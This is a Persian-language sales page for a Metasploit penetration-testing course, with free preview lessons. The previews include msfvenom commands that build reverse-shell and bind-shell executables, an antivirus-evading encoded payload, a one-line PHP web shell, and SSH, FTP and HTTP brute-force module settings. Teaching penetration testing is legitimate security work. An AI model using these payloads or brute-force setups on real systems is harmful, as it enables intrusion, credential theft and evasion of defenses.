50 %

دوره تست نفوذ با متاسپلویت | دوره آموزش Metasploit

توضیحات

زبان دوره: فارسی
مدت زمان : 9 ساعت
نوع دوره : مجازی
پیش نیاز ها : مبانی هک و امنیت، لینوکس
تاریخ شروع دوره : آبان ماه 1403
27 ویدیو
دریافت لینک ها بلافاصله پس از پرداخت
سطح دوره : مقدماتی تا متوسطه
مدرک حضور در دوره

دوره تست نفوذ با متاسپلویت | Metasploit

بعد از تهیه دوره دقت کنید !

جهت دسترسی به فایل ها و ویدیو های دوره تست نفوذ با متاسپلویت | Metasploit
  به قسمت دانلود ها در داشبورد کاربری خود بروید !

برای دانلود بهتر است با IDM در ویندوز و ADM در اندروید اقدام به دانلود کنید و با WinRAR فایل ها را استخراج کنید !

معرفی دوره آموزشی متاسپلویت (Metasploit)

آیا به دنبال یادگیری یک ابزار قدرتمند برای تست نفوذ و ارزیابی امنیت شبکه هستید ؟
دوره آموزشی متاسپلویت (Metasploit) بهترین انتخاب برای شماست ! با شرکت در این دوره، مهارت‌های لازم برای استفاده از یکی از پرکاربردترین ابزارهای امنیت سایبری را به دست خواهید آورد.

 

چرا دوره متاسپلویت

متاسپلویت یک فریم‌ورک تست نفوذ بسیار پیشرفته است که به کاربران امکان می‌دهد
آسیب‌پذیری‌های سیستم‌ها و شبکه‌ها را شناسایی و بهره‌برداری کنند. این ابزار توسط متخصصان امنیت سایبری در سراسر جهان برای انجام تست‌های امنیتی استفاده می‌شود و دارای کتابخانه‌ای گسترده از اکسپلویت‌ها و ماژول‌های مختلف است.

معرفی سرفصل‌های دوره متاسپلویت :

فریم ورک متاسپلویت (Metasploit Framework) یکی از قدرتمندترین و پرکاربردترین ابزارهای موجود در زمینه تست نفوذ و ارزیابی امنیت سایبری است. این فریم ورک با ارائه مجموعه‌ای گسترده از ابزارها و ماژول‌های متنوع، به متخصصان امنیتی امکان می‌دهد تا به شناسایی، بهره‌برداری و رفع آسیب‌پذیری‌های موجود در سیستم‌ها و شبکه‌ها بپردازند. متاسپلویت، که توسط شرکت Rapid7 توسعه یافته است، به دلیل انعطاف‌پذیری و قابلیت استفاده در محیط‌های مختلف، به یکی از ابزارهای ضروری در جعبه‌ابزار هر کارشناس امنیت تبدیل شده است. با استفاده از متاسپلویت، می‌توان حملات واقعی را شبیه‌سازی کرد، آسیب‌پذیری‌های نرم‌افزارها و سیستم‌عامل‌ها را آزمایش کرد و اقدامات امنیتی پیشگیرانه‌ای را برای مقابله با تهدیدات سایبری پیاده‌سازی نمود. این فریم ورک به خصوص برای کسانی که به دنبال یادگیری عمیق‌تر مفاهیم امنیتی و بهبود توانایی‌های خود در تست نفوذ هستند، یک ابزار بی‌نظیر به شمار می‌آید.

بررسی تاریخچه ایجاد ابزار متاسپلویت

نصب و راه‌اندازی Metasploit در سیستم‌های عامل مختلف، اولین گام برای شروع کار با این فریم ورک قدرتمند است. در ادامه به روش نصب و راه‌اندازی Metasploit در دو سیستم‌عامل محبوب لینوکس و ویندوز می‌پردازیم.

فریم ورک متاسپلویت (Metasploit Framework) یک ابزار قدرتمند و چندمنظوره است که توسط متخصصان امنیت سایبری برای تست نفوذ و ارزیابی امنیت سیستم‌ها و شبکه‌ها استفاده می‌شود. در زیر به برخی از کاربردهای اصلی متاسپلویت در تست نفوذ اشاره شده است:

1. شناسایی آسیب‌پذیری‌ها

متاسپلویت شامل مجموعه‌ای گسترده از اسکنرها و ماژول‌های شناسایی است که به تست‌کنندگان نفوذ امکان می‌دهد تا آسیب‌پذیری‌های موجود در سیستم‌ها، نرم‌افزارها و شبکه‌ها را شناسایی کنند. این ابزار می‌تواند به سرعت نقاط ضعف مختلف را کشف کند و گزارشی از این آسیب‌پذیری‌ها ارائه دهد.

2. بهره‌برداری از آسیب‌پذیری‌ها

یکی از قابلیت‌های برجسته متاسپلویت، امکان بهره‌برداری (exploitation) از آسیب‌پذیری‌های شناسایی شده است. این فریم ورک دارای کتابخانه‌ای غنی از اکسپلویت‌ها برای آسیب‌پذیری‌های مختلف است که به متخصصان امنیتی اجازه می‌دهد تا به سیستم‌های هدف دسترسی پیدا کنند و به بررسی عمق آسیب‌پذیری‌ها بپردازند.

3. شبیه‌سازی حملات واقعی

متاسپلویت به کاربران این امکان را می‌دهد که حملات واقعی سایبری را شبیه‌سازی کنند. با استفاده از این فریم ورک، می‌توان انواع حملات مانند تزریق SQL، حملات فیشینگ، حملات بر روی سیستم‌عامل‌ها و نرم‌افزارهای مختلف را شبیه‌سازی کرد. این شبیه‌سازی‌ها به تیم‌های امنیتی کمک می‌کند تا آمادگی لازم برای مقابله با حملات واقعی را به دست آورند.

4. آزمایش و ارزیابی امنیتی

تیم‌های امنیتی و تست‌کنندگان نفوذ می‌توانند از متاسپلویت برای ارزیابی امنیتی سیستم‌ها و شبکه‌ها استفاده کنند. این ابزار به آن‌ها امکان می‌دهد تا نقاط ضعف موجود را شناسایی و بهره‌برداری کنند و سپس به بررسی و تقویت اقدامات امنیتی بپردازند.

5. آموزش و توسعه مهارت‌ها

متاسپلویت یک ابزار عالی برای آموزش و توسعه مهارت‌های تست نفوذ و امنیت سایبری است. با استفاده از این فریم ورک، افراد علاقه‌مند به امنیت سایبری می‌توانند تکنیک‌ها و روش‌های مختلف حملات و دفاع را یاد بگیرند و مهارت‌های خود را در محیطی امن و کنترل‌شده تمرین کنند.

6. ایجاد و استفاده از ماژول‌های سفارشی

یکی دیگر از قابلیت‌های متاسپلویت، امکان ایجاد و استفاده از ماژول‌های سفارشی است. کاربران می‌توانند اکسپلویت‌ها و اسکریپت‌های خاص خود را توسعه دهند و آن‌ها را در متاسپلویت به کار بگیرند، که این امر انعطاف‌پذیری و کاربردپذیری این فریم ورک را افزایش می‌دهد.

با توجه به این کاربردها، متاسپلویت به یکی از ابزارهای اصلی و ضروری در جعبه‌ابزار هر تست‌کننده نفوذ و متخصص امنیت سایبری تبدیل شده است.

 
 

فریم ورک متاسپلویت از چند بخش اصلی تشکیل شده که هر کدام کاربردهای ویژه‌ای در فرآیند تست نفوذ دارند. در ادامه به معرفی مختصر این بخش‌ها می‌پردازیم:

1. ماژول‌های اکسپلویت (Exploits)

این بخش شامل کدهای بهره‌برداری است که برای نفوذ به سیستم‌های هدف استفاده می‌شود. هر ماژول اکسپلویت برای یک آسیب‌پذیری خاص طراحی شده است.

2. ماژول‌های پِی‌لود (Payloads)

پِی‌لودها کدهایی هستند که پس از بهره‌برداری اجرا می‌شوند. این کدها می‌توانند شامل Reverse Shell ها، Bind Shell ها و دیگر انواع دسترسی‌ها باشند.

3. ماژول‌های کمکی (Auxiliary)

ماژول‌های Auxiliary شامل ابزارهایی برای اسکن، جمع‌آوری اطلاعات و انجام وظایف دیگر هستند که به فرآیند تست نفوذ کمک می‌کنند.

4. ماژول‌های پس از بهره‌برداری (Post-Exploitation)

این ماژول‌ها برای انجام فعالیت‌های پس از بهره‌برداری مانند جمع‌آوری اطلاعات سیستم، استخراج گذرواژه‌ها و حفظ دسترسی به سیستم‌های هدف استفاده می‌شوند.

5. ماژول‌های انکودر (Encoders)

انکودرها برای رمزگذاری پِی‌لودها به کار می‌روند تا توسط نرم‌افزارهای امنیتی شناسایی نشوند.

6. ماژول‌های نوپتر (Nops)

این ماژول‌ها برای تولید دستورات No-Operation استفاده می‌شوند که در فرایند بهره‌برداری به پایداری اکسپلویت کمک می‌کنند.

این بخش‌ها به متاسپلویت امکان می‌دهند تا یک ابزار جامع و قدرتمند برای تست نفوذ و ارزیابی امنیت سایبری باشد.

فریم ورک متاسپلویت (Metasploit Framework) به طور عمده با استفاده از زبان برنامه‌نویسی روبی (Ruby) توسعه یافته است. انتخاب روبی به دلیل قابلیت‌های فراوان و انعطاف‌پذیری بالای این زبان بوده است. در ادامه به بررسی نقش و مزایای زبان روبی در متاسپلویت می‌پردازیم:

1. انعطاف‌پذیری بالا

روبی یک زبان برنامه‌نویسی شیءگرا و انعطاف‌پذیر است که به توسعه‌دهندگان اجازه می‌دهد تا کدهای کاربرپسند و قابل خواندن بنویسند. این ویژگی به تیم توسعه متاسپلویت امکان داده تا ابزارهای پیچیده را به صورت ساده و قابل فهم طراحی کنند.

2. سازگاری و توسعه سریع

یکی از مزایای روبی، توانایی توسعه و بروزرسانی سریع کدها است. این قابلیت به تیم متاسپلویت اجازه می‌دهد تا به سرعت به روز رسانی‌ها و اکسپلویت‌های جدید را اضافه کرده و به تغییرات دنیای امنیت سایبری واکنش نشان دهند.

3. پشتیبانی از کتابخانه‌های مختلف

روبی دارای کتابخانه‌های متنوعی است که به توسعه‌دهندگان امکان می‌دهد تا از ابزارها و منابع مختلف برای توسعه قابلیت‌های جدید استفاده کنند. این کتابخانه‌ها به غنای فریم ورک متاسپلویت افزوده و آن را به یکی از جامع‌ترین ابزارهای تست نفوذ تبدیل کرده‌اند.

4. سهولت در نوشتن اسکریپت‌های سفارشی

یکی از دلایل محبوبیت متاسپلویت، امکان نوشتن و استفاده از ماژول‌ها و اسکریپت‌های سفارشی است. با استفاده از روبی، کاربران می‌توانند به راحتی اسکریپت‌های خود را توسعه داده و از آن‌ها در متاسپلویت استفاده کنند.

5. جامعه پشتیبان قوی

زبان روبی دارای یک جامعه فعال و پشتیبان قوی است که منابع و مستندات زیادی را برای یادگیری و حل مشکلات فراهم می‌کند. این امر به توسعه‌دهندگان متاسپلویت کمک می‌کند تا از تجربیات و دانش جامعه بهره ببرند.

نتیجه‌گیری

استفاده از زبان روبی در توسعه متاسپلویت، این فریم ورک را به یک ابزار قدرتمند، انعطاف‌پذیر و قابل توسعه تبدیل کرده است که به متخصصان امنیت سایبری امکان می‌دهد تا به طور مؤثر به شناسایی و بهره‌برداری از آسیب‌پذیری‌ها بپردازند.

معرفی و آشنایی جزیی با زبان برنامه نویسی روبی 

فریم ورک متاسپلویت با ارائه ویژگی‌های متنوع، به کاربران امکان می‌دهد تا به طور موثر از آن برای تست نفوذ و ارزیابی امنیت استفاده کنند. در اینجا به آموزش نحوه کار با برخی از ویژگی‌های کلیدی این ابزار، مانند جستجو و استفاده از ماژول‌ها، می‌پردازیم.

1. جستجو در متاسپلویت

متاسپلویت دارای تعداد زیادی ماژول است که شامل اکسپلویت‌ها، پِی‌لودها، ماژول‌های کمکی و دیگر ابزارها می‌شود. برای جستجو در میان این ماژول‌ها، می‌توانید از دستور search استفاده کنید.

مثال جستجو برای یک اکسپلویت خاص:

msfconsole
search exploit windows

این دستور، تمام اکسپلویت‌های مرتبط با ویندوز را نمایش می‌دهد. شما می‌توانید از کلمات کلیدی مختلف برای محدود کردن نتایج جستجو استفاده کنید.

2. اطلاعات در مورد یک ماژول

پس از یافتن ماژول مورد نظر، می‌توانید از دستور info برای دریافت اطلاعات بیشتر در مورد آن ماژول استفاده کنید.

مثال:

info exploit/windows/smb/ms08_067_netapi

این دستور، جزئیات مربوط به اکسپلویت MS08-067 در پروتکل SMB ویندوز را نمایش می‌دهد.

3. بارگذاری و استفاده از ماژول‌ها

برای بارگذاری و استفاده از یک ماژول، از دستور use استفاده کنید. سپس می‌توانید تنظیمات مورد نیاز را پیکربندی کنید.

مثال:
use exploit/windows/smb/ms08_067_netapi

با اجرای این دستور، اکسپلویت مورد نظر بارگذاری می‌شود.

 

استفاده از دستورات سرچ و کار با ماژول‌ها متاسپلویست

ماژول‌های کمکی یا Auxiliary در فریم ورک متاسپلویت به شما کمک می‌کنند تا وظایف مختلفی مانند اسکن، جمع‌آوری اطلاعات و انجام فعالیت‌های قبل و بعد از نفوذ را انجام دهید. در اینجا به آموزش نحوه کار با ماژول‌های کمکی مختلف می‌پردازیم.

 

1. جستجو و انتخاب ماژول کمکی

برای یافتن ماژول‌های کمکی، می‌توانید از دستور search استفاده کنید.

مثال:
msfconsole
search auxiliary scanner

این دستور تمام ماژول‌های کمکی مربوط به اسکنر را نمایش می‌دهد.

2. بارگذاری ماژول کمکی

پس از یافتن ماژول کمکی مورد نظر، از دستور use برای بارگذاری آن استفاده کنید.

مثال:
use auxiliary/scanner/http/http_version

این دستور، ماژول اسکنر نسخه HTTP را بارگذاری می‌کند.

3. نمایش گزینه‌های ماژول کمکی

برای مشاهده گزینه‌های موجود در ماژول بارگذاری شده، از دستور show options استفاده کنید.

مثال:
 
show options

این دستور، تمام گزینه‌های قابل تنظیم برای ماژول اسکنر HTTP را نمایش می‌دهد.

4. تنظیم گزینه‌های ماژول کمکی

برای تنظیم گزینه‌ها، از دستور set استفاده کنید.

مثال:
 
set RHOSTS 192.168.1.0/24
set THREADS 10

این دستورها، محدوده آدرس‌های IP هدف و تعداد رشته‌های موازی را تنظیم می‌کنند.

5. اجرای ماژول کمکی

پس از تنظیم همه گزینه‌ها، ماژول کمکی را با استفاده از دستور run اجرا کنید.

مثال:
 
run

این دستور، ماژول اسکنر HTTP را اجرا کرده و نتایج اسکن را نمایش می‌دهد.

مثال‌های دیگر از ماژول‌های کمکی

1. اسکن پورت‌ها با ماژول TCP Port Scanner

بارگذاری ماژول:
 
use auxiliary/scanner/portscan/tcp
تنظیم گزینه‌ها:
 
set RHOSTS 192.168.1.0/24
set PORTS 80,443,8080
set THREADS 10
اجرای ماژول:
run

2. شناسایی سرویس‌ها با ماژول Service Discovery

بارگذاری ماژول:
 
use auxiliary/scanner/discovery/udp_sweep
تنظیم گزینه‌ها:
 
set RHOSTS 192.168.1.0/24
set THREADS 10
اجرای ماژول:
run

3. جمع‌آوری اطلاعات با ماژول DNS Enumeration

بارگذاری ماژول:
 
use auxiliary/gather/enum_dns
تنظیم گزینه‌ها:
 
set DOMAIN example.com
اجرای ماژول:
run

نتیجه‌گیری

ماژول‌های Auxiliary در متاسپلویت ابزارهای قدرتمندی برای اسکن، جمع‌آوری اطلاعات و انجام وظایف مختلف قبل و بعد از نفوذ هستند. با استفاده از دستورات ساده و تنظیم گزینه‌های مختلف، می‌توانید به راحتی از این ماژول‌ها برای ارزیابی امنیتی سیستم‌ها و شبکه‌ها استفاده کنید. تمرین و آشنایی با این ماژول‌ها به شما کمک می‌کند تا از قابلیت‌های متاسپلویت به بهترین شکل بهره‌برداری کنید.

حملات بروت فورس (Brute Force) یکی از روش‌های متداول برای شکستن گذرواژه‌ها و دسترسی به سیستم‌ها و سرویس‌های مختلف است. در فریم ورک متاسپلویت (Metasploit Framework)، ماژول‌های متعددی برای انجام حملات بروت فورس وجود دارد که به کاربران امکان می‌دهد تا گذرواژه‌ها و اطلاعات ورود را با استفاده از روش‌های مختلف آزمون و خطا (trial and error) به دست آورند. در اینجا به بررسی نحوه اجرای حملات بروت فورس با استفاده از متاسپلویت می‌پردازیم.

1. ماژول‌های بروت فورس در متاسپلویت

ماژول‌های مختلفی در متاسپلویت برای انجام حملات بروت فورس بر روی سرویس‌های مختلف وجود دارد. این ماژول‌ها شامل حملات بروت فورس بر روی پروتکل‌های SSH، FTP، Telnet، HTTP و غیره هستند.

2. جستجو برای ماژول‌های بروت فورس

ابتدا می‌توانید برای پیدا کردن ماژول‌های بروت فورس، از دستور search استفاده کنید.

مثال:
 
msfconsole search brute

این دستور لیستی از ماژول‌های مرتبط با حملات بروت فورس را نمایش می‌دهد.

3. بارگذاری و تنظیم ماژول بروت فورس

برای بارگذاری یک ماژول بروت فورس، از دستور use استفاده کنید. سپس می‌توانید گزینه‌های مربوط به ماژول را تنظیم کنید.

مثال: حمله بروت فورس بر روی سرویس SSH
بارگذاری ماژول:
 
use auxiliary/scanner/ssh/ssh_login
نمایش گزینه‌های ماژول:
show options
تنظیم گزینه‌ها:
 
set RHOSTS 192.168.1.100
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
set THREADS 5

در این مثال، RHOSTS آدرس IP هدف است، USER_FILE و PASS_FILE فایل‌های متنی حاوی نام‌های کاربری و گذرواژه‌ها هستند و THREADS تعداد درخواست‌های موازی همزمان برای حمله را تنظیم می‌کند.

4. اجرای ماژول بروت فورس

پس از تنظیم گزینه‌ها، می‌توانید ماژول بروت فورس را با استفاده از دستور run اجرا کنید.

مثال:
 
run

این دستور حمله بروت فورس را آغاز می‌کند و متاسپلویت شروع به تست نام‌های کاربری و گذرواژه‌های مختلف می‌کند تا زمانی که دسترسی موفقی حاصل شود یا تمام ترکیب‌ها امتحان شوند.

مثال‌های دیگر از حملات بروت فورس

1. حمله بروت فورس بر روی سرویس FTP

بارگذاری ماژول:
 
use auxiliary/scanner/ftp/ftp_login
تنظیم گزینه‌ها:
 
set RHOSTS 192.168.1.100
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
set THREADS 5
اجرای ماژول:
 
run

2. حمله بروت فورس بر روی سرویس HTTP

بارگذاری ماژول:
use auxiliary/scanner/http/http_login
تنظیم گزینه‌ها:
 
set RHOSTS 192.168.1.100
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
set THREADS 5
اجرای ماژول:
 
run

نتیجه‌گیری

حملات بروت فورس یکی از روش‌های مؤثر برای دسترسی به سیستم‌ها و سرویس‌های مختلف است. فریم ورک متاسپلویت با ارائه ماژول‌های متنوع برای انجام این نوع حملات، ابزار قدرتمندی در اختیار متخصصان امنیت سایبری قرار می‌دهد. با استفاده از دستورات و تنظیمات ساده، می‌توانید به راحتی حملات بروت فورس را بر روی سرویس‌های مختلف اجرا کرده و امنیت سیستم‌ها را ارزیابی کنید.

msfvenom یکی از ابزارهای قدرتمند و انعطاف‌پذیر در فریم ورک متاسپلویت (Metasploit Framework) است که برای ایجاد و تولید payloadها  استفاده می‌شود. این ابزار، دو ابزار قدیمی msfpayload و msfencode را ترکیب کرده و امکانات بیشتری را در یک ابزار جامع فراهم می‌کند.

 

ویژگی‌ها و قابلیت‌های msfvenom

  1. تولید Payloadهای مختلف: msfvenom قابلیت تولید انواع مختلف payloadها را دارد که شامل payloadهای بایند شل، شل معکوس، و انواع مختلف دسترسی‌های مخفیانه است. این payloadها می‌توانند برای سیستم‌عامل‌ها و پلتفرم‌های مختلف تولید شوند.

  2. پشتیبانی از فرمت‌های خروجی متنوع: این ابزار می‌تواند payloadها را در فرمت‌های خروجی مختلفی مانند فایل‌های اجرایی، اسکریپت‌ها، و کدهای منبع تولید کند. برخی از فرمت‌های خروجی عبارتند از: exe، elf، apk، raw، و غیره.

  3. رمزگذاری و انکودینگ: msfvenom قابلیت رمزگذاری و انکودینگ payloadها را دارد تا بتوان از تشخیص و شناسایی آن‌ها توسط نرم‌افزارهای امنیتی جلوگیری کرد. این ویژگی به ویژه در حملات و نفوذها بسیار مهم است.

  4. انعطاف‌پذیری در تنظیمات: کاربران می‌توانند تنظیمات مختلفی مانند آدرس IP و پورت برای payloadها تعیین کنند تا به نیازهای خاص خود پاسخ دهند.

نحوه استفاده از msfvenom

برای استفاده از msfvenom، باید از خط فرمان (command line) استفاده کنید. در ادامه به برخی از دستورات و مثال‌های کاربردی می‌پردازیم:

1. تولید یک payload ساده برای شل معکوس TCP
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > shell_reverse_tcp.exe

این دستور یک فایل اجرایی ویندوزی با payload شل معکوس TCP تولید می‌کند که به آدرس IP 192.168.1.10 و پورت 4444 متصل می‌شود.

2. تولید یک payload برای لینوکس در فرمت elf
 
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf > shell_reverse_tcp.elf

این دستور یک فایل اجرایی لینوکسی با payload شل معکوس TCP تولید می‌کند.

3. استفاده از انکودینگ برای رمزگذاری payload
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -f exe > encoded_shell_reverse_tcp.exe

این دستور از انکودر x86/shikata_ga_nai برای رمزگذاری payload استفاده می‌کند.

4. لیست کردن payloadهای موجود
bash
msfvenom -l payloads

این دستور لیستی از تمام payloadهای موجود را نمایش می‌دهد.

5. تولید payload در فرمت raw برای استفاده در اسکریپت‌ها
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw > shell_reverse_tcp.raw

این دستور یک payload در فرمت raw تولید می‌کند که می‌توان از آن در اسکریپت‌ها استفاده کرد.

نتیجه‌گیری

msfvenom یک ابزار قدرتمند و چندمنظوره برای تولید و انکودینگ payloadها در فریم ورک متاسپلویت است. این ابزار با پشتیبانی از انواع فرمت‌های خروجی و قابلیت‌های گسترده در تولید و انکودینگ payloadها، به متخصصان امنیت سایبری امکان می‌دهد تا حملات پیچیده و موثری را طراحی و اجرا کنند. یادگیری و تسلط بر استفاده از msfvenom، یکی از مهارت‌های اساسی در تست نفوذ و ارزیابی امنیت سایبری است.

در زمینه تست نفوذ و امنیت سایبری، شل (Shell) به دستوری اشاره دارد که به مهاجم امکان اجرای دستورات بر روی سیستم هدف را می‌دهد. انواع مختلفی از شل‌ها وجود دارند که هر کدام کاربردهای خاص خود را دارند. در اینجا به معرفی و بررسی برخی از مهم‌ترین انواع شل‌ها می‌پردازیم.

1. شل معکوس (Reverse Shell)

در شل معکوس، سیستم هدف به ماشین مهاجم متصل می‌شود. این نوع شل بیشتر در محیط‌هایی استفاده می‌شود که سیستم هدف در پشت فایروال یا NAT قرار دارد.

مثال:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > reverse_shell.exe

2. بایند شل (Bind Shell)

در بایند شل، سیستم هدف یک پورت را باز کرده و منتظر می‌ماند تا مهاجم به آن متصل شود. این نوع شل در مواردی استفاده می‌شود که مهاجم به طور مستقیم به سیستم هدف دسترسی دارد.

مثال:
msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.1.100 LPORT=4444 -f exe > bind_shell.exe

3. مترپرتر شل (Meterpreter Shell)

مترپرتر شل یک شل پیشرفته و پویا است که توسط فریم ورک متاسپلویت ارائه می‌شود. این شل قابلیت‌های زیادی مانند آپلود و دانلود فایل‌ها، اجرا و مدیریت فرآیندها، و جمع‌آوری اطلاعات سیستم را دارد.

مثال:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > meterpreter_reverse_shell.exe

4. Command Shell

Command Shell یک شل ساده است که به مهاجم اجازه می‌دهد دستورات سیستم‌عامل را بر روی سیستم هدف اجرا کند. این شل‌ها ساده‌ترین نوع شل‌ها هستند و معمولاً امکانات پیشرفته‌ای مانند مترپرتر شل ندارند.

مثال:
 
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.10 LPORT=4444 -f raw > reverse_bash.sh

5. شل وب (Web Shell)

شل وب یک اسکریپت است که بر روی سرور وب قرار می‌گیرد و به مهاجم اجازه می‌دهد دستورات را از طریق مرورگر وب اجرا کند. این نوع شل‌ها اغلب در حملات وب سرورها استفاده می‌شوند.

مثال:

یک اسکریپت PHP ساده برای شل وب:

 
<?php system($_GET['cmd']); ?>

نتیجه‌گیری

انواع مختلف شل‌ها ابزارهای قدرتمندی در دست متخصصان تست نفوذ و امنیت سایبری هستند. انتخاب نوع مناسب شل بستگی به محیط و شرایط هدف دارد. آشنایی و تسلط بر استفاده از این شل‌ها می‌تواند به افزایش اثربخشی حملات و ارزیابی‌های امنیتی کمک کند.

ساخت پیلود و تست کردن آنتی ویروس

آنتی‌ویروس‌ها از روش‌های مختلفی برای شناسایی و مسدود کردن پیلودهای مخرب استفاده می‌کنند. این روش‌ها ترکیبی از تکنیک‌های ایستا و پویا هستند که به شناسایی تهدیدات و جلوگیری از اجرای آنها در سیستم‌ها کمک می‌کنند. در ادامه، به بررسی برخی از این روش‌ها می‌پردازیم.

 

روش های به چالش کشیدن آنتی ویروس

Nmap (مخفف Network Mapper) یک ابزار قدرتمند و رایگان برای کاوش و ممیزی امنیت شبکه است که توسط Gordon Lyon (Fyodor) توسعه یافته است. این ابزار برای شناسایی دستگاه‌های موجود در شبکه، کشف پورت‌های باز، و شناسایی خدمات و سیستم‌عامل‌های اجراشده بر روی آنها استفاده می‌شود. Nmap به عنوان یکی از ابزارهای اساسی در تست نفوذ و ارزیابی امنیت شبکه‌ها شناخته می‌شود.

 

ثبت‌نام در دوره آموزش nmap

روش ها دسترسی گرفتن از ویندوز

روش های دور زدن UAC در ویندوز

بررسی دستورات Post Exploitation در ویندوز

روش های مخفی ماندن در ویندوز

روش های جمع آوری اطلاعات از Active Directory

روش های تست نفوذ Active Directory با متاسپلویت

دستورات Post Exploitation در اکتیو دایرکتوری

لترال موومنت (Lateral Movement) در امنیت سایبری به تکنیک‌ها و روش‌هایی اطلاق می‌شود که مهاجمان سایبری پس از دستیابی اولیه به یک سیستم، از آن‌ها برای جابجایی در شبکه استفاده می‌کنند. هدف این روش‌ها معمولاً افزایش سطح دسترسی، دسترسی به سیستم‌های حیاتی‌تر، و در نهایت رسیدن به اهداف اصلی مانند استخراج داده‌ها یا اجرای باج‌افزار است.

CVE (Common Vulnerabilities and Exposures) یک سیستم شناسایی و نام‌گذاری استاندارد برای آسیب‌پذیری‌ها و اکسپلویت‌های امنیتی است. این سیستم توسط موسسه MITRE و با حمایت سازمان امنیت سایبری و زیرساخت‌های آمریکا (CISA) مدیریت می‌شود. هدف اصلی CVE این است که یک نامگذاری و توصیف یکتا برای هر آسیب‌پذیری ارائه دهد، به طوری که این آسیب‌پذیری‌ها به صورت یکپارچه و قابل فهم برای همه متخصصان امنیتی و توسعه‌دهندگان نرم‌افزار در سراسر جهان باشد.

معرفی فریم ورک متاسپلویت و کاربرد آن

بررسی متاسپلویت و کاربرد آن به صورت ساده

رایگان
معرفی تاریخچه و اهمیت Metasploit

معرفی ابزاری برای امنیت سایبری

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
نصب و راه اندازی Metasploit در لینوکس و ویندوز

راهنمای گام به گام نصب و راه اندازی Metasploit در لینوکس و ویندوز

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
کاربردهای متاسپلویت در تست نفوذ

ابزاری کلیدی برای شبیه‌سازی حملات

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
معرفی بخش های مختلف متاسپلویت

بخش‌های مختلف Metasploit: شناخت اجزای کلیدی و عملکرد آنها

رایگان
معرفی زبان برنامه نویسی روبی و آشنایی جزیی با زبان برنامه نویسی روبی

ویژگی‌ها، کاربردها و مزایا

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
کار با فیچرهای متاسپلویت مانند سرچ و استفاده

آموزش کار با فیچرهای ابزار مانند سرچ و استفاده

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
استفاده از دستورات سرچ و کار با ماژول‌ها

استفاده از دستورات سرچ و کار با ماژول‌ها

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
آموزش کار با Auxiliary های مختلف

کار با Auxiliary های مختلف

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
آموزش جمع اوری اطلاعات با متاسپلویت

جمع اوری اطلاعات با متاسپلویت

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
بررسی حملات بروت فورس در متاسپلویت

حملات بروت فورس در متاسپلویت

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
معرفی msfvenom

بررسی ابزار msfvenom

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
ساخت انواع پیلود با msfvenom

ساخت پیلود با msfvenom

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
معرفی انواع شل

بررسی shell ها

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
ساخت پیلود و تست کردن آنتی ویروس

چالش آنتی ویروس

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
روش های شناسایی پیلود های مخرب توسط آنتی ویروس

چالش آنتی ویروس

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
تعامل nmap با متاسپلویت

کار با nmap در متاسپلویت

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
روش های دور زدن UAC در ویندوز

بای‌پس UAC

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
بررسی دستورات Post Exploitation در ویندوز

Post Exploitation در ویندوز

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
روش های مخفی ماندن در ویندوز

مخفی ماندن در ویندوز

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
روش های جمع آوری اطلاعات از Active Directory

information gathering

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
روش های تست نفوذ Active Directory با متاسپلویت

تست نفوذ Active Directory با متاسپلویت

خصوصی
محتوای این درس فقط به خریداران نمایش داده میشود . برای دسترسی کامل به محتوای دوره آن را خریداری کنید.
دستورات Post Exploitation در اکتیو دایرکتوری

Post Exploitation در اکتیو دایرکتوری

خصوصی
